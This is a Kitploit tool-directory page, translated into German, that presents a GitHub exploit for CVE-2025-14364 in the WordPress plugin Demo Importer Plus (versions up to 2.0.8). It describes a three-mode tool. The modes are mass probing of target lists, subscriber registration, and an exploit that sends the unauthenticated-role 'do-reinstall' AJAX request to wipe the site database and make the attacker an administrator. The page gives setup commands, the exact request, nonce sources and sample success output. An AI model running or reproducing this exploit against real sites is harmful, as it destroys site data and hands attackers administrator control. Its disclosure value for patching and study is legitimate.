Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-14364 — Demo Importer Plus <= 2.0.8 - Fehlende Autorisierung für authentifiziertes (Subscriber+) Site-Reset und Privilegienerweiterung | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-14364
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-14364

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Fehlende Autorisierung für authentifiziertes (Subscriber+) Site-Reset und Privilegienerweiterung

Repository anzeigen
1vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-14364

Demo Importer Plus <= 2.0.8 - Fehlende Autorisierung für authentifizierten (Abonnent+) Site-Reset und Privilegieneskalation

CVE-2025-14364 — Demo Importer Plus · Vollständiger Site-Reset → Privilegieneskalation

root@kitploit:~
  _      _   _   _  _   _            _   _
 / \  / |_ __ ) / \  ) |_ __ /| |_|_ _) |_ |_|_
 \_ \/  |_   /_ \_/ /_  _)    |   |  _) |_)  |

Authentifizierter Abonnent → Administrator über die AJAX-Aktion do-reinstall


CVE CVSS Plugin Auth Python Platform Author


〔 1 〕 Schwachstelle

Grundursache:
Ajax::handle_request() registriert die AJAX-Aktion demo_importer_plus, ohne current_user_can() aufzurufen. Jeder authentifizierte Abonnent kann {"demo_action":"do-reinstall"} senden, um wp_install() auszulösen. Dadurch werden alle Datenbanktabellen (außer users / usermeta) gelöscht und die WordPress-Einrichtung erneut ausgeführt — wobei dem angreifenden Konto automatisch die Administrator-Rolle zugewiesen wird.


〔 2 〕 Angriffsablauf

root@kitploit:~
Mode 1 — Diagnose
  Probe: DNS · /wp-login.php · /wp-admin/admin-ajax.php · REST /wp/v2/users
  → Identify live WordPress targets

Mode 2 — Register
  POST /wp-login.php?action=register
  → Create subscriber account
  → Activation email sent to inbox
     ↳ You MUST click the email link before running Mode 3

Mode 3 — Exploit
  POST /wp-login.php                         → Authenticate as subscriber
  GET  /wp-admin/                            → Extract wp-rest-nonce
  POST /wp-admin/admin-ajax.php
       action=demo_importer_plus
       {"demo_action":"do-reinstall"}        → Trigger full site reset
  ← Response: "Site has been reset successfully"
  → Attacking account now holds Administrator role

〔 3 〕 Einrichtung

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-14364.git
cd CVE-2025-14364
pip install -r requirements.txt
python3 CVE-2025-14364.py

requirements.txt

root@kitploit:~
aiohttp>=3.9.0
colorama>=0.4.6
urllib3>=1.26.0

〔 4 〕 Verwendung

root@kitploit:~
Mode [1/2/3]:           1 = Diagnose   2 = Register   3 = Exploit
Targets file:           list.txt  (one host per line)
Concurrency:            default 30, max 200
Timeout:                default 10s

Zielformat — list.txt:

root@kitploit:~
https://target1.com
target2.com
http://target3.com

► Modus 1 · Diagnose

Testet vier Endpunkte pro Host und schreibt saubere Ergebnisse.

root@kitploit:~
Mode: 1

Ausgabe → diagnostics_results.txt · passed_targets.txt


► Modus 2 · Registrieren

root@kitploit:~
Mode: 2
Email:    [email protected]
Username: Nxploited
Password: NxploitedSA

Überprüfen Sie Ihren Posteingang und klicken Sie auf den Aktivierungslink, bevor Sie Modus 3 ausführen.

Ausgabe → register_results.txt


► Modus 3 · Exploit

root@kitploit:~
Mode: 3
Username: Nxploited
Password: NxploitedSA

Bei Erfolg gibt das Tool Folgendes aus:

root@kitploit:~
[HH:MM:SS] SUCCESS  "success":true,"message":"Site has been reset successfully" -> https://target.com

Anschließend schreibt es in exploit_results.txt:

root@kitploit:~
https://target.com/wp-login.php  site:...  user:Nxploited  pass:NxploitedSA  type:admin

〔 5 〕 Ausgabedateien


〔 6 〕 Technische Details

Verwundbare Anfrage:

root@kitploit:~
POST /wp-admin/admin-ajax.php?action=demo_importer_plus HTTP/1.1
Content-Type: application/json
X-WP-Nonce: <extracted_nonce>

{"demo_action":"do-reinstall"}

Erfolgreiche Antwort:

root@kitploit:~
{"success": true, "data": {"message": "Site has been reset successfully"}}

Nonce-Extraktion — zwei Fallback-Quellen:

root@kitploit:~
wpApiSettings.nonce              (from /wp-admin/ page source)
elementorOneSettingsData.wpRestNonce   (fallback)

〔 7 〕 Autor & Kontakt

root@kitploit:~
By   : Nxploited (Khaled Alenazi)
GitHub   : https://github.com/Nxploited
Telegram : @KNxploited

GitHub Telegram


〔 8 〕 Haftungsausschluss

root@kitploit:~
THIS SOFTWARE IS RELEASED STRICTLY FOR SECURITY RESEARCH AND EDUCATION.

The author bears zero responsibility for any actions taken with this tool
against systems the operator does not own or have explicit written
authorization to test.

Unauthorized use against third-party systems violates computer crime laws
in most jurisdictions (CFAA, CMA, and equivalents worldwide) and may result
in criminal prosecution.

You alone are responsible for ensuring you have lawful permission
before running this tool against any target.

© 2025 Nxploited · Nur für Sicherheitsforschung · Demo Importer Plus ≤ 2.0.8 · Behoben in 2.0.9
Tool herunterladen
CVECVE-2025-14364
CVSS v3.18.8 HIGH — CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
PluginDemo Importer Plus
BetroffenAlle Versionen ≤ 2.0.8
Auth erforderlichAbonnent (niedrigste registrierte Rolle)
TypFehlende Berechtigungsprüfung → Vollständiger Site-Reset → Privilegieneskalation
CWECWE-862 · Fehlende Autorisierung
DateiInhalt
diagnostics_results.txtVollständiges Probe-JSON pro Ziel
passed_targets.txtSaubere Ziele (keine Fehler erkannt)
register_results.txtAufzeichnungen der Registrierungsversuche
exploit_results.txtLogin · Nonce · Reset-Ergebnisse · bestätigte Admin-Treffer
reset_results.txtRohe do-reinstall-Antwort pro Ziel